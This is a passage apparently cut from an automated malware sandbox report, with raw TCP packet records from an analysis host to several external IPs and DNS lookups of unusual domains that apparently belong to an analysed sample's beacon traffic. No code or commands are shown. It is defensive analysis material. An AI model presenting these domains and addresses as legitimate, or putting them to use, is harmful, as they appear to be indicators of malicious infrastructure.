                      Jul 2, 2024 07:17:40.264661074 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264672041 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264730930 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.264842033 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264853001 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264863968 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264873981 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.264885902 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.264920950 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.265302896 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.265314102 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.265325069 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.265341997 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.265366077 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.275130033 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.275587082 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.275603056 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.275660992 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.315449953 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.351625919 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.351706982 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.351811886 CEST8049737199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:40.351857901 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:40.351857901 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:41.159617901 CEST4973780192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:42.178426981 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:42.183249950 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:42.183307886 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:42.185389042 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:42.190293074 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050575018 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050594091 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050602913 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050637007 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.050851107 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050862074 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050873995 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.050887108 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.050920963 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.051343918 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.051356077 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.051364899 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.051390886 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.051805019 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.051858902 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.055417061 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.055542946 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.055552959 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.055579901 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.055910110 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.055948019 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.242316961 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.242398977 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.242409945 CEST8049738199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:43.243501902 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:43.690510988 CEST4973880192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:44.709929943 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:44.714813948 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:44.714884996 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:44.716671944 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:44.721560001 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:44.721580982 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.627377033 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.627474070 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.627486944 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.627580881 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:45.627866030 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.627876997 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.627954960 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:45.628530979 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.628597021 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.628607035 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.628655910 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:45.628721952 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:45.629069090 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.629168987 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.629228115 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:45.632661104 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.632680893 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.632690907 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.632783890 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:45.827069998 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.827121019 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.827172041 CEST8049739199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:45.827243090 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:46.221771002 CEST4973980192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.241216898 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.247478962 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.251298904 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.253896952 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.258644104 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.960751057 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.960773945 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.960783958 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.960887909 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.960998058 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961205959 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.961219072 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961230993 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961271048 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.961544991 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961555004 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961565018 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961576939 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.961625099 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.961677074 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.966187954 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.966365099 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.966526031 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.966626883 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:47.966631889 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:47.966881990 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:48.090167046 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:48.090292931 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:48.090305090 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:48.090436935 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:48.097265959 CEST4974080192.168.2.5199.192.19.19
                      Jul 2, 2024 07:17:48.102132082 CEST8049740199.192.19.19192.168.2.5
                      Jul 2, 2024 07:17:53.131320953 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:53.136091948 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.136157990 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:53.138400078 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:53.143177032 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.832395077 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.832453012 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.832463026 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.832684040 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.832709074 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:53.832933903 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:53.835338116 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.835494995 CEST8049741213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:53.835700035 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:54.643616915 CEST4974180192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:55.663726091 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:55.672362089 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:55.672456980 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:55.674478054 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:55.679230928 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.395361900 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.395380974 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.395389080 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.395441055 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:56.395613909 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.395651102 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:56.398175001 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.399005890 CEST8049742213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:56.399055958 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:57.190540075 CEST4974280192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:58.209455013 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:58.214329004 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.214394093 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:58.216372013 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:58.221204996 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.221545935 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.912574053 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.912674904 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.912687063 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.912720919 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:58.915380001 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.915432930 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:58.915548086 CEST8049743213.145.228.16192.168.2.5
                      Jul 2, 2024 07:17:58.915586948 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:17:59.722069979 CEST4974380192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:00.740698099 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:00.745611906 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:00.745680094 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:00.747570038 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:00.752284050 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:01.447443962 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:01.447515011 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:01.447526932 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:01.447659016 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:01.450016975 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:01.450100899 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:01.450114012 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:01.450279951 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:01.452698946 CEST4974480192.168.2.5213.145.228.16
                      Jul 2, 2024 07:18:01.457437992 CEST8049744213.145.228.16192.168.2.5
                      Jul 2, 2024 07:18:06.483773947 CEST4974580192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:06.488513947 CEST804974591.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:06.488579988 CEST4974580192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:06.490978956 CEST4974580192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:06.495764971 CEST804974591.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:07.127055883 CEST804974591.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:07.127501965 CEST804974591.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:07.127566099 CEST4974580192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:08.003014088 CEST4974580192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:09.022280931 CEST4974680192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:09.027138948 CEST804974691.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:09.027209997 CEST4974680192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:09.029320955 CEST4974680192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:09.034115076 CEST804974691.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:09.665121078 CEST804974691.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:09.665216923 CEST804974691.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:09.665416956 CEST4974680192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:10.536235094 CEST4974680192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:11.555283070 CEST4974780192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:11.561682940 CEST804974791.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:11.561794043 CEST4974780192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:11.566694975 CEST4974780192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:11.572504044 CEST804974791.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:11.572619915 CEST804974791.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:13.065551996 CEST4974780192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:13.070930004 CEST804974791.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:13.071003914 CEST4974780192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:14.085447073 CEST4974880192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:14.090430975 CEST804974891.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:14.090523005 CEST4974880192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:14.093550920 CEST4974880192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:14.098387003 CEST804974891.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:14.753308058 CEST804974891.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:14.753592014 CEST804974891.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:14.753642082 CEST4974880192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:14.759639025 CEST4974880192.168.2.591.195.240.19
                      Jul 2, 2024 07:18:14.773200035 CEST804974891.195.240.19192.168.2.5
                      Jul 2, 2024 07:18:19.891597986 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:19.896414995 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:19.897375107 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:19.901547909 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:19.906301975 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:20.619415045 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:20.619503021 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:20.619514942 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:20.619538069 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:20.619884014 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:20.619894981 CEST8049749194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:20.619920015 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:20.619937897 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:21.409426928 CEST4974980192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:22.428639889 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:22.646332026 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:22.646406889 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:22.648730040 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:22.653572083 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609554052 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609580994 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609592915 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609700918 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:23.609797955 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609808922 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609847069 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609858036 CEST8049750194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:23.609991074 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:23.609991074 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:24.161653042 CEST4975080192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:25.178879976 CEST4975180192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:25.183677912 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.183751106 CEST4975180192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:25.186091900 CEST4975180192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:25.190862894 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.190942049 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.903903961 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.903991938 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.904004097 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.904345989 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:25.909307957 CEST4975180192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:26.024473906 CEST8049751194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:26.029298067 CEST4975180192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:26.690964937 CEST4975180192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:27.709233999 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:27.778785944 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:27.778904915 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:27.780798912 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:27.785515070 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479067087 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479089975 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479099035 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479186058 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.479327917 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479340076 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479352951 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479362965 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.479384899 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.479922056 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479932070 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479942083 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479952097 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.479978085 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.480006933 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.480537891 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:28.480585098 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.484179020 CEST4975280192.168.2.5194.58.112.174
                      Jul 2, 2024 07:18:28.488861084 CEST8049752194.58.112.174192.168.2.5
                      Jul 2, 2024 07:18:33.518311977 CEST4975380192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:33.523180962 CEST8049753172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:33.529294968 CEST4975380192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:33.529294968 CEST4975380192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:33.534028053 CEST8049753172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:35.034317017 CEST4975380192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:35.039957047 CEST8049753172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:35.040005922 CEST4975380192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:36.052959919 CEST4975480192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:36.057799101 CEST8049754172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:36.057964087 CEST4975480192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:36.061328888 CEST4975480192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:36.066096067 CEST8049754172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:37.565551043 CEST4975480192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:37.570761919 CEST8049754172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:37.570833921 CEST4975480192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:38.584770918 CEST4975580192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:38.589755058 CEST8049755172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:38.589828968 CEST4975580192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:38.591787100 CEST4975580192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:38.597445965 CEST8049755172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:38.597455978 CEST8049755172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:40.098453999 CEST4975580192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:40.208306074 CEST8049755172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:40.210388899 CEST4975580192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:41.117322922 CEST4975680192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:41.122266054 CEST8049756172.67.210.102192.168.2.5
                      Jul 2, 2024 07:18:41.122340918 CEST4975680192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:41.124767065 CEST4975680192.168.2.5172.67.210.102
                      Jul 2, 2024 07:18:41.129544020 CEST8049756172.67.210.102192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Jul 2, 2024 07:15:21.920525074 CEST | 192.168.2.5 | 1.1.1.1 | 0xd39 | Standard query (0) | www.hprlz.cz | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:15:37.693293095 CEST | 192.168.2.5 | 1.1.1.1 | 0x14d7 | Standard query (0) | www.catherineviskadi.com | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:15:51.011611938 CEST | 192.168.2.5 | 1.1.1.1 | 0x53a5 | Standard query (0) | www.hatercoin.online | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:04.475919008 CEST | 192.168.2.5 | 1.1.1.1 | 0x584 | Standard query (0) | www.fourgrouw.cfd | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:12.537833929 CEST | 192.168.2.5 | 1.1.1.1 | 0x97dc | Standard query (0) | www.bfiworkerscomp.com | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:29.490046024 CEST | 192.168.2.5 | 1.1.1.1 | 0x5cb8 | Standard query (0) | www.tinmapco.com | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:37.555125952 CEST | 192.168.2.5 | 1.1.1.1 | 0xf79a | Standard query (0) | www.xn--fhq1c541j0zr.com | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:16:51.477303028 CEST | 192.168.2.5 | 1.1.1.1 | 0x90f3 | Standard query (0) | www.xn--matfrmn-jxa4m.se | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:17:04.865983009 CEST | 192.168.2.5 | 1.1.1.1 | 0x6780 | Standard query (0) | www.anuts.top | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:17:39.606132030 CEST | 192.168.2.5 | 1.1.1.1 | 0xd3a | Standard query (0) | www.telwisey.info | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:17:53.101135015 CEST | 192.168.2.5 | 1.1.1.1 | 0x95f1 | Standard query (0) | www.sandranoll.com | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:06.460133076 CEST | 192.168.2.5 | 1.1.1.1 | 0xd0f | Standard query (0) | www.gipsytroya.com | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:19.773435116 CEST | 192.168.2.5 | 1.1.1.1 | 0xaa09 | Standard query (0) | www.helpers-lion.online | A (IP address) | IN (0x0001) | false
                      Jul 2, 2024 07:18:33.491307020 CEST | 192.168.2.5 | 1.1.1.1 | 0xded2 | Standard query (0) | www.dmtxwuatbz.cc | A (IP address) | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Jul 2, 2024 07:15:21.958450079 CEST | 1.1.1.1 | 192.168.2.5 | 0xd39 | No error (0) | www.hprlz.cz |  | 5.44.111.162 | A (IP address) | IN (0x0001) | false
